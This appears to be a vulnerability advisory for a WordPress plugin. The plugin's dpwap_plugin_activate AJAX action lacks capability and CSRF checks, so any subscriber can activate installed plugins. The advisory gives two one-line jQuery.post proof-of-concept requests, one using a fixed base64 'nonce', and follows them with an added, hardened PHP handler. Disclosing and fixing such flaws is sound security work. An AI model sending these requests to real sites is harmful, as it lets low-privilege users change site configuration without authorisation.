The plugin does not have capability and CSRF checks in the dpwap_plugin_activate AJAX action, allowing any authenticated user, such as a subscriber, to activate plugins that are already installed.
v < 1.5.9 - jQuery.post(ajaxurl,{ action:"dpwap_plugin_activate", dpwap_url:"hello.php" })
v < 1.6.0 - jQuery.post(ajaxurl,{ action:"dpwap_plugin_activate", dpwap_url:"hello.php", nonce: base64('dpwap-metagauss') })
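What a handler for this action looks like with both missing checks in place, as an added example (not the plugin's own code or its actual fix). The function name `example_dpwap_plugin_activate` and the nonce action `example_dpwap_activate` are hypothetical; the WordPress API calls are real.

```php
<?php
// Added example: hypothetical hardened handler, not the plugin's actual code.
// Assumed names: example_dpwap_plugin_activate(), nonce action 'example_dpwap_activate'.

// Register only the authenticated hook; no wp_ajax_nopriv_ variant.
add_action( 'wp_ajax_dpwap_plugin_activate', 'example_dpwap_plugin_activate' );

function example_dpwap_plugin_activate() {
    // CSRF check: the admin page must emit wp_create_nonce( 'example_dpwap_activate' ),
    // which is bound to the user and session. A fixed string such as
    // base64('dpwap-metagauss') is the same for every user, so it is not a nonce.
    // check_ajax_referer() terminates the request when the value does not verify.
    check_ajax_referer( 'example_dpwap_activate', 'nonce' );

    // Capability check: subscribers do not hold 'activate_plugins'.
    if ( ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // Read the requested plugin file (same parameter name as in the advisory).
    $plugin = isset( $_POST['dpwap_url'] )
        ? sanitize_text_field( wp_unslash( $_POST['dpwap_url'] ) )
        : '';

    // validate_plugin() returns WP_Error for traversal sequences and for files
    // that are not among the installed plugins.
    if ( '' === $plugin || is_wp_error( validate_plugin( $plugin ) ) ) {
        wp_send_json_error( array( 'message' => 'Invalid plugin.' ), 400 );
    }

    // activate_plugin() returns null on success or WP_Error on failure.
    $result = activate_plugin( $plugin );
    if ( is_wp_error( $result ) ) {
        wp_send_json_error( array( 'message' => $result->get_error_message() ), 500 );
    }

    wp_send_json_success( array( 'activated' => $plugin ) );
}
```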
apple502j
apple502j
Yes
2021-10-19 (about 1 year ago)
2021-10-19 (about 1 year ago)
2022-04-08 (about 1 year ago)